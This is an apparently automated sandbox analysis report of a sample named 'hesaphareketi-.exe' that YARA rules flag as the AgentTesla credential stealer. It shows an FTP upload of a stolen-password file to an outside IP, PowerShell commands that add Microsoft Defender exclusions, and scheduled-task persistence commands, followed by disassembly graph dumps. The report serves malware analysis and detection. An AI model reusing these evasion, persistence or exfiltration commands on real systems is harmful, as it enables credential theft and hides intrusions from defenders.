                                          Jun 27, 2024 09:16:48.518785954 CEST2149707104.247.165.99192.168.2.5504 Unknown command
                                          Jun 27, 2024 09:16:48.542098999 CEST4970721192.168.2.5104.247.165.99PWD
                                          Jun 27, 2024 09:16:48.760163069 CEST2149707104.247.165.99192.168.2.5257 "/" is your current location
                                          Jun 27, 2024 09:16:48.763032913 CEST4970721192.168.2.5104.247.165.99TYPE I
                                          Jun 27, 2024 09:16:48.981028080 CEST2149707104.247.165.99192.168.2.5200 TYPE is now 8-bit binary
                                          Jun 27, 2024 09:16:48.982683897 CEST4970721192.168.2.5104.247.165.99PASV
                                          Jun 27, 2024 09:16:49.200829983 CEST2149707104.247.165.99192.168.2.5227 Entering Passive Mode (104,247,165,99,199,97)
                                          Jun 27, 2024 09:16:49.222300053 CEST4970721192.168.2.5104.247.165.99STOR PW_user-960781_2024_06_27_03_16_45.html
                                          Jun 27, 2024 09:16:49.863991022 CEST2149707104.247.165.99192.168.2.5150 Accepted data connection
                                          Jun 27, 2024 09:16:50.086592913 CEST2149707104.247.165.99192.168.2.5226-File successfully transferred
                                          226-File successfully transferred226 0.222 seconds (measured here), 1.41 Kbytes per second

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:03:16:38
                                          Start date:27/06/2024
                                          Path:C:\Users\user\Desktop\hesaphareketi-.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\hesaphareketi-.exe"
                                          Imagebase:0x80000
                                          File size:615'936 bytes
                                          MD5 hash:D8AA0C3EAED283B8D78298748900F395
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2069027456.0000000003474000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2069027456.0000000003474000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:2
                                          Start time:03:16:39
                                          Start date:27/06/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe"
                                          Imagebase:0x970000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:03:16:39
                                          Start date:27/06/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:4
                                          Start time:03:16:39
                                          Start date:27/06/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe"
                                          Imagebase:0x970000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:5
                                          Start time:03:16:39
                                          Start date:27/06/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:6
                                          Start time:03:16:40
                                          Start date:27/06/2024
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp"
                                          Imagebase:0x730000
                                          File size:187'904 bytes
                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:7
                                          Start time:03:16:40
                                          Start date:27/06/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:8
                                          Start time:03:16:41
                                          Start date:27/06/2024
                                          Path:C:\Users\user\Desktop\hesaphareketi-.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\hesaphareketi-.exe"
                                          Imagebase:0xcd0000
                                          File size:615'936 bytes
                                          MD5 hash:D8AA0C3EAED283B8D78298748900F395
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4487969528.0000000000403000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4487969528.0000000000403000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4492018819.000000000304E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4492018819.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4492018819.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:false

                                          General

                                          Target ID:9
                                          Start time:03:16:41
                                          Start date:27/06/2024
                                          Path:C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe
                                          Imagebase:0x280000
                                          File size:615'936 bytes
                                          MD5 hash:D8AA0C3EAED283B8D78298748900F395
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2100310326.0000000003645000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2100310326.0000000003645000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Antivirus matches:
                                          • Detection: 100%, Avira
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 53%, ReversingLabs
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:10
                                          Start time:03:16:43
                                          Start date:27/06/2024
                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                          Imagebase:0x7ff6ef0c0000
                                          File size:496'640 bytes
                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:11
                                          Start time:03:16:44
                                          Start date:27/06/2024
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpBF7D.tmp"
                                          Imagebase:0x730000
                                          File size:187'904 bytes
                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:12
                                          Start time:03:16:44
                                          Start date:27/06/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:13
                                          Start time:03:16:45
                                          Start date:27/06/2024
                                          Path:C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe"
                                          Imagebase:0x830000
                                          File size:615'936 bytes
                                          MD5 hash:D8AA0C3EAED283B8D78298748900F395
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4492600143.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4492600143.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4492600143.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:false

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:11.8%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:143
                                            Total number of Limit Nodes:6
                                            execution_graph 25510 229d478 25511 229d4be GetCurrentProcess 25510->25511 25513 229d509 25511->25513 25514 229d510 GetCurrentThread 25511->25514 25513->25514 25515 229d54d GetCurrentProcess 25514->25515 25516 229d546 25514->25516 25517 229d583 25515->25517 25516->25515 25518 229d5ab GetCurrentThreadId 25517->25518 25519 229d5dc 25518->25519 25441 49b97d9 25442 49b97ef 25441->25442 25446 229874a 25442->25446 25452 2296034 25442->25452 25443 49ba3fe 25447 2298758 25446->25447 25449 2298a0b 25447->25449 25458 229b0c0 25447->25458 25448 2298a49 25448->25443 25449->25448 25462 229d1a1 25449->25462 25453 229603f 25452->25453 25455 2298a0b 25453->25455 25456 229b0c0 2 API calls 25453->25456 25454 2298a49 25454->25443 25455->25454 25457 229d1a1 2 API calls 25455->25457 25456->25455 25457->25454 25467 229b0e9 25458->25467 25471 229b0f8 25458->25471 25459 229b0d6 25459->25449 25463 229d1d1 25462->25463 25464 229d1f5 25463->25464 25494 229d360 25463->25494 25498 229d350 25463->25498 25464->25448 25468 229b0f8 25467->25468 25474 229b1f0 25468->25474 25469 229b107 25469->25459 25473 229b1f0 2 API calls 25471->25473 25472 229b107 25472->25459 25473->25472 25475 229b201 25474->25475 25476 229b224 25474->25476 25475->25476 25482 229b478 25475->25482 25486 229b488 25475->25486 25476->25469 25477 229b21c 25477->25476 25478 229b428 GetModuleHandleW 25477->25478 25479 229b455 25478->25479 25479->25469 25483 229b49c 25482->25483 25485 229b4c1 25483->25485 25490 229ac28 25483->25490 25485->25477 25487 229b49c 25486->25487 25488 229ac28 LoadLibraryExW 25487->25488 25489 229b4c1 25487->25489 25488->25489 25489->25477 25491 229b668 LoadLibraryExW 25490->25491 25493 229b6e1 25491->25493 25493->25485 25495 229d36d 25494->25495 25496 229d3a7 25495->25496 25502 229cc88 25495->25502 25496->25464 25500 229d36d 25498->25500 25499 229d3a7 25499->25464 25500->25499 25501 229cc88 2 API calls 25500->25501 25501->25499 25503 229cc93 25502->25503 25505 229dcb8 25503->25505 25506 229cdb4 25503->25506 25505->25505 25507 229cdbf 25506->25507 25508 2296034 2 API calls 25507->25508 25509 229dd27 25508->25509 25509->25505 25541 bad01c 25542 bad034 25541->25542 25543 bad08e 25542->25543 25548 49b1e98 25542->25548 25552 49b0ad4 25542->25552 25561 49b2c08 25542->25561 25570 49b1ea8 25542->25570 25549 49b1ece 25548->25549 25550 49b0ad4 CallWindowProcW 25549->25550 25551 49b1eef 25550->25551 25551->25543 25553 49b0adf 25552->25553 25554 49b2c79 25553->25554 25556 49b2c69 25553->25556 25590 49b0bfc 25554->25590 25574 49b2e6c 25556->25574 25580 49b2da0 25556->25580 25585 49b2d90 25556->25585 25557 49b2c77 25564 49b2c45 25561->25564 25562 49b2c79 25563 49b0bfc CallWindowProcW 25562->25563 25566 49b2c77 25563->25566 25564->25562 25565 49b2c69 25564->25565 25567 49b2e6c CallWindowProcW 25565->25567 25568 49b2d90 CallWindowProcW 25565->25568 25569 49b2da0 CallWindowProcW 25565->25569 25567->25566 25568->25566 25569->25566 25571 49b1ece 25570->25571 25572 49b0ad4 CallWindowProcW 25571->25572 25573 49b1eef 25572->25573 25573->25543 25575 49b2e2a 25574->25575 25576 49b2e7a 25574->25576 25594 49b2e49 25575->25594 25597 49b2e58 25575->25597 25577 49b2e40 25577->25557 25582 49b2db4 25580->25582 25581 49b2e40 25581->25557 25583 49b2e49 CallWindowProcW 25582->25583 25584 49b2e58 CallWindowProcW 25582->25584 25583->25581 25584->25581 25586 49b2db4 25585->25586 25588 49b2e49 CallWindowProcW 25586->25588 25589 49b2e58 CallWindowProcW 25586->25589 25587 49b2e40 25587->25557 25588->25587 25589->25587 25591 49b0c07 25590->25591 25592 49b435a CallWindowProcW 25591->25592 25593 49b4309 25591->25593 25592->25593 25593->25557 25595 49b2e69 25594->25595 25600 49b4292 25594->25600 25595->25577 25598 49b2e69 25597->25598 25599 49b4292 CallWindowProcW 25597->25599 25598->25577 25599->25598 25601 49b4299 25600->25601 25602 49b0bfc CallWindowProcW 25601->25602 25603 49b42aa 25602->25603 25603->25595 25520 49b978c 25521 49b9796 25520->25521 25532 49b9308 25521->25532 25523 49b971f 25524 49b9724 25523->25524 25526 49b9308 LoadLibraryExW GetModuleHandleW 25523->25526 25527 49b92f8 25523->25527 25524->25524 25526->25523 25528 49b9303 25527->25528 25530 229874a 2 API calls 25528->25530 25531 2296034 2 API calls 25528->25531 25529 49ba3fe 25529->25523 25530->25529 25531->25529 25533 49b9313 25532->25533 25536 49b9438 25533->25536 25535 49ba83f 25535->25523 25537 49b9443 25536->25537 25539 229874a 2 API calls 25537->25539 25540 2296034 2 API calls 25537->25540 25538 49ba8c4 25538->25535 25539->25538 25540->25538 25604 229d6c0 DuplicateHandle 25605 229d756 25604->25605 25606 49b1cf0 25607 49b1d58 CreateWindowExW 25606->25607 25609 49b1e14 25607->25609 25610 49b9ce7 25611 49b9ced 25610->25611 25613 229874a 2 API calls 25611->25613 25614 2296034 2 API calls 25611->25614 25612 49ba3fe 25613->25612 25614->25612

                                            Executed Functions

                                            Function 049B7210 Relevance: 4.7, Strings: 3, Instructions: 958COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 338 49b7210-49b7274 340 49b727a-49b7430 338->340 341 49b7864-49b787d 338->341 472 49b746a-49b746c 340->472 473 49b7432-49b7468 340->473 344 49b78f8-49b7941 341->344 345 49b787f-49b78a3 341->345 354 49b794e-49b7956 344->354 355 49b7943-49b7949 344->355 349 49b78a9-49b78b4 345->349 350 49b7ed0-49b7eff 345->350 349->350 353 49b78ba-49b78d6 349->353 366 49b7f19-49b7f3f 350->366 367 49b7f01-49b7f09 350->367 353->350 357 49b78dc-49b78f7 353->357 359 49b7958-49b797c 354->359 360 49b797e 354->360 358 49b79e6-49b7a31 355->358 372 49b7aae-49b7b2d 358->372 373 49b7a33-49b7a5f 358->373 364 49b7985-49b7987 359->364 360->364 370 49b7989-49b798b 364->370 371 49b798d-49b7993 364->371 379 49b7f7f-49b7f97 366->379 380 49b7f41-49b7f51 366->380 367->366 374 49b7f0b-49b7f18 367->374 370->358 377 49b799b-49b79a3 371->377 372->350 383 49b7b33-49b7b5c 372->383 373->350 385 49b7a65-49b7a6c 373->385 377->358 382 49b79a5-49b79a8 377->382 394 49b7f99-49b7fad 379->394 395 49b7fb4-49b7fb8 379->395 396 49b7f6e-49b7f75 380->396 397 49b7f53-49b7f67 380->397 384 49b79ae-49b79b6 382->384 383->350 387 49b7b62-49b7b6f 383->387 384->350 388 49b79bc-49b79e4 384->388 385->350 389 49b7a72-49b7a7e 385->389 387->350 392 49b7b75-49b7b91 387->392 388->358 388->384 389->350 393 49b7a84-49b7a90 389->393 400 49b7b97-49b7b9d 392->400 401 49b7c16-49b7c42 392->401 393->350 404 49b7a96-49b7aa6 393->404 394->395 395->379 399 49b7fba-49b7fbe 395->399 402 49b7fbf-49b802a 396->402 403 49b7f77-49b7f7e 396->403 397->396 407 49b7bc9-49b7bde 400->407 408 49b7b9f-49b7bc3 400->408 409 49b7c9a-49b7cac 401->409 410 49b7c44-49b7c48 401->410 404->372 407->350 415 49b7be4-49b7c00 407->415 408->407 412 49b7cae-49b7cb3 409->412 413 49b7cb5-49b7cb9 409->413 410->409 416 49b7c4a 410->416 417 49b7d1b-49b7d22 412->417 413->350 418 49b7cbf-49b7cc7 413->418 415->350 421 49b7c06-49b7c14 415->421 422 49b7c4f-49b7c5d 416->422 426 49b7d8a-49b7daa 417->426 427 49b7d24-49b7d32 417->427 418->350 424 49b7ccd-49b7cda 418->424 421->400 421->401 422->350 428 49b7c63-49b7c78 422->428 424->350 429 49b7ce0-49b7ced 424->429 444 49b7dad-49b7dd4 426->444 427->426 432 49b7d34-49b7d4c 427->432 428->350 433 49b7c7e-49b7c8b 428->433 429->350 434 49b7cf3-49b7d10 429->434 441 49b7d78-49b7d88 432->441 442 49b7d4e 432->442 433->350 436 49b7c91-49b7c98 433->436 434->417 436->409 436->422 441->444 445 49b7d51-49b7d53 442->445 448 49b7dda-49b7e5b 444->448 449 49b7e5e-49b7e71 444->449 445->350 446 49b7d59-49b7d67 445->446 446->350 450 49b7d6d-49b7d76 446->450 448->449 451 49b7e73-49b7ea1 449->451 452 49b7ec5-49b7ecf 449->452 450->441 450->445 451->452 464 49b7ea3-49b7ebf 451->464 464->452 474 49b746e-49b7470 472->474 475 49b7472-49b747c 472->475 473->472 476 49b747e-49b7498 474->476 475->476 479 49b749a-49b749c 476->479 480 49b749e-49b74a6 476->480 482 49b74a8-49b74ad 479->482 480->482 483 49b74af-49b74ba 482->483 484 49b74c0-49b74e9 482->484 483->484 488 49b74eb-49b74f7 484->488 489 49b7524-49b752e 484->489 488->489 492 49b74f9-49b7506 488->492 490 49b7530 489->490 491 49b7537-49b75c3 489->491 490->491 502 49b7605-49b7613 491->502 503 49b75c5-49b7603 491->503 495 49b7508-49b750a 492->495 496 49b750c-49b751f 492->496 495->489 496->489 506 49b761e-49b7666 502->506 503->506 523 49b7669 call 49b83d1 506->523 524 49b7669 call 49b8330 506->524 525 49b7669 call 49b8320 506->525 510 49b766f-49b76ef 526 49b76f5 call 49b8c41 510->526 527 49b76f5 call 49b8c50 510->527 514 49b76fb-49b76fd 515 49b772b-49b7747 514->515 516 49b76ff-49b7729 514->516 519 49b7749 515->519 520 49b7755-49b7756 515->520 516->515 519->520 520->341 523->510 524->510 525->510 526->514 527->514
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q$LR]q$\s]q
                                            • API String ID: 0-1846294405
                                            • Opcode ID: 33c297fc9e70cc4a08bf777415b21b59af8744c7a7508fdbf56b989b1e9100b7
                                            • Instruction ID: cad40d1236ad9a8066846accadf07a81b9890b6cd4d9e16fb02a45200394c2a7
                                            • Opcode Fuzzy Hash: 33c297fc9e70cc4a08bf777415b21b59af8744c7a7508fdbf56b989b1e9100b7
                                            • Instruction Fuzzy Hash: 6A828E35A102198FCB14CFA9D984AADB7F2FFC9300F15C6A9E059EB355DB34A941CB90
                                            Function 049B71FE Relevance: 2.9, Strings: 2, Instructions: 363COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 550 49b71fe-49b7274 552 49b727a-49b7430 550->552 553 49b7864-49b787d 550->553 684 49b746a-49b746c 552->684 685 49b7432-49b7468 552->685 556 49b78f8-49b7941 553->556 557 49b787f-49b78a3 553->557 566 49b794e-49b7956 556->566 567 49b7943-49b7949 556->567 561 49b78a9-49b78b4 557->561 562 49b7ed0-49b7eff 557->562 561->562 565 49b78ba-49b78d6 561->565 578 49b7f19-49b7f3f 562->578 579 49b7f01-49b7f09 562->579 565->562 569 49b78dc-49b78f7 565->569 571 49b7958-49b797c 566->571 572 49b797e 566->572 570 49b79e6-49b7a31 567->570 584 49b7aae-49b7b2d 570->584 585 49b7a33-49b7a5f 570->585 576 49b7985-49b7987 571->576 572->576 582 49b7989-49b798b 576->582 583 49b798d-49b7993 576->583 591 49b7f7f-49b7f97 578->591 592 49b7f41-49b7f51 578->592 579->578 586 49b7f0b-49b7f18 579->586 582->570 589 49b799b-49b79a3 583->589 584->562 595 49b7b33-49b7b5c 584->595 585->562 597 49b7a65-49b7a6c 585->597 589->570 594 49b79a5-49b79a8 589->594 606 49b7f99-49b7fad 591->606 607 49b7fb4-49b7fb8 591->607 608 49b7f6e-49b7f75 592->608 609 49b7f53-49b7f67 592->609 596 49b79ae-49b79b6 594->596 595->562 599 49b7b62-49b7b6f 595->599 596->562 600 49b79bc-49b79e4 596->600 597->562 601 49b7a72-49b7a7e 597->601 599->562 604 49b7b75-49b7b91 599->604 600->570 600->596 601->562 605 49b7a84-49b7a90 601->605 612 49b7b97-49b7b9d 604->612 613 49b7c16-49b7c42 604->613 605->562 616 49b7a96-49b7aa6 605->616 606->607 607->591 611 49b7fba-49b7fbe 607->611 614 49b7fbf-49b802a 608->614 615 49b7f77-49b7f7e 608->615 609->608 619 49b7bc9-49b7bde 612->619 620 49b7b9f-49b7bc3 612->620 621 49b7c9a-49b7cac 613->621 622 49b7c44-49b7c48 613->622 616->584 619->562 627 49b7be4-49b7c00 619->627 620->619 624 49b7cae-49b7cb3 621->624 625 49b7cb5-49b7cb9 621->625 622->621 628 49b7c4a 622->628 629 49b7d1b-49b7d22 624->629 625->562 630 49b7cbf-49b7cc7 625->630 627->562 633 49b7c06-49b7c14 627->633 634 49b7c4f-49b7c5d 628->634 638 49b7d8a-49b7daa 629->638 639 49b7d24-49b7d32 629->639 630->562 636 49b7ccd-49b7cda 630->636 633->612 633->613 634->562 640 49b7c63-49b7c78 634->640 636->562 641 49b7ce0-49b7ced 636->641 656 49b7dad-49b7dd4 638->656 639->638 644 49b7d34-49b7d4c 639->644 640->562 645 49b7c7e-49b7c8b 640->645 641->562 646 49b7cf3-49b7d10 641->646 653 49b7d78-49b7d88 644->653 654 49b7d4e 644->654 645->562 648 49b7c91-49b7c98 645->648 646->629 648->621 648->634 653->656 657 49b7d51-49b7d53 654->657 660 49b7dda-49b7e5b 656->660 661 49b7e5e-49b7e71 656->661 657->562 658 49b7d59-49b7d67 657->658 658->562 662 49b7d6d-49b7d76 658->662 660->661 663 49b7e73-49b7ea1 661->663 664 49b7ec5-49b7ecf 661->664 662->653 662->657 663->664 676 49b7ea3-49b7ebf 663->676 676->664 686 49b746e-49b7470 684->686 687 49b7472-49b747c 684->687 685->684 688 49b747e-49b7498 686->688 687->688 691 49b749a-49b749c 688->691 692 49b749e-49b74a6 688->692 694 49b74a8-49b74ad 691->694 692->694 695 49b74af-49b74ba 694->695 696 49b74c0-49b74e9 694->696 695->696 700 49b74eb-49b74f7 696->700 701 49b7524-49b752e 696->701 700->701 704 49b74f9-49b7506 700->704 702 49b7530 701->702 703 49b7537-49b75c3 701->703 702->703 714 49b7605-49b7613 703->714 715 49b75c5-49b7603 703->715 707 49b7508-49b750a 704->707 708 49b750c-49b751f 704->708 707->701 708->701 718 49b761e-49b7666 714->718 715->718 735 49b7669 call 49b83d1 718->735 736 49b7669 call 49b8330 718->736 737 49b7669 call 49b8320 718->737 722 49b766f-49b76ef 738 49b76f5 call 49b8c41 722->738 739 49b76f5 call 49b8c50 722->739 726 49b76fb-49b76fd 727 49b772b-49b7747 726->727 728 49b76ff-49b7729 726->728 731 49b7749 727->731 732 49b7755-49b7756 727->732 728->727 731->732 732->553 735->722 736->722 737->722 738->726 739->726
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q$\s]q
                                            • API String ID: 0-2162871153
                                            • Opcode ID: daef5a14c93e0b380006168b414ece10bd99472483f8da009d8bada7f3bb46d3
                                            • Instruction ID: 647b07e7220de593dfa0f952d8e95c5486566fe02cea5a0cf3c8a748d6d4c98f
                                            • Opcode Fuzzy Hash: daef5a14c93e0b380006168b414ece10bd99472483f8da009d8bada7f3bb46d3
                                            • Instruction Fuzzy Hash: 30D16E35E1121A8FDB14DF69D980AAEB7F2FFC8305F158669D406EB354DB34A902CB90
                                            Function 049B724A Relevance: 2.9, Strings: 2, Instructions: 351COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 740 49b724a-49b7260 742 49b726d-49b7274 740->742 743 49b7262-49b726c 740->743 744 49b727a-49b7430 742->744 745 49b7864-49b787d 742->745 743->742 876 49b746a-49b746c 744->876 877 49b7432-49b7468 744->877 748 49b78f8-49b7941 745->748 749 49b787f-49b78a3 745->749 758 49b794e-49b7956 748->758 759 49b7943-49b7949 748->759 753 49b78a9-49b78b4 749->753 754 49b7ed0-49b7eff 749->754 753->754 757 49b78ba-49b78d6 753->757 770 49b7f19-49b7f3f 754->770 771 49b7f01-49b7f09 754->771 757->754 761 49b78dc-49b78f7 757->761 763 49b7958-49b797c 758->763 764 49b797e 758->764 762 49b79e6-49b7a31 759->762 776 49b7aae-49b7b2d 762->776 777 49b7a33-49b7a5f 762->777 768 49b7985-49b7987 763->768 764->768 774 49b7989-49b798b 768->774 775 49b798d-49b7993 768->775 783 49b7f7f-49b7f97 770->783 784 49b7f41-49b7f51 770->784 771->770 778 49b7f0b-49b7f18 771->778 774->762 781 49b799b-49b79a3 775->781 776->754 787 49b7b33-49b7b5c 776->787 777->754 789 49b7a65-49b7a6c 777->789 781->762 786 49b79a5-49b79a8 781->786 798 49b7f99-49b7fad 783->798 799 49b7fb4-49b7fb8 783->799 800 49b7f6e-49b7f75 784->800 801 49b7f53-49b7f67 784->801 788 49b79ae-49b79b6 786->788 787->754 791 49b7b62-49b7b6f 787->791 788->754 792 49b79bc-49b79e4 788->792 789->754 793 49b7a72-49b7a7e 789->793 791->754 796 49b7b75-49b7b91 791->796 792->762 792->788 793->754 797 49b7a84-49b7a90 793->797 804 49b7b97-49b7b9d 796->804 805 49b7c16-49b7c42 796->805 797->754 808 49b7a96-49b7aa6 797->808 798->799 799->783 803 49b7fba-49b7fbe 799->803 806 49b7fbf-49b802a 800->806 807 49b7f77-49b7f7e 800->807 801->800 811 49b7bc9-49b7bde 804->811 812 49b7b9f-49b7bc3 804->812 813 49b7c9a-49b7cac 805->813 814 49b7c44-49b7c48 805->814 808->776 811->754 819 49b7be4-49b7c00 811->819 812->811 816 49b7cae-49b7cb3 813->816 817 49b7cb5-49b7cb9 813->817 814->813 820 49b7c4a 814->820 821 49b7d1b-49b7d22 816->821 817->754 822 49b7cbf-49b7cc7 817->822 819->754 825 49b7c06-49b7c14 819->825 826 49b7c4f-49b7c5d 820->826 830 49b7d8a-49b7daa 821->830 831 49b7d24-49b7d32 821->831 822->754 828 49b7ccd-49b7cda 822->828 825->804 825->805 826->754 832 49b7c63-49b7c78 826->832 828->754 833 49b7ce0-49b7ced 828->833 848 49b7dad-49b7dd4 830->848 831->830 836 49b7d34-49b7d4c 831->836 832->754 837 49b7c7e-49b7c8b 832->837 833->754 838 49b7cf3-49b7d10 833->838 845 49b7d78-49b7d88 836->845 846 49b7d4e 836->846 837->754 840 49b7c91-49b7c98 837->840 838->821 840->813 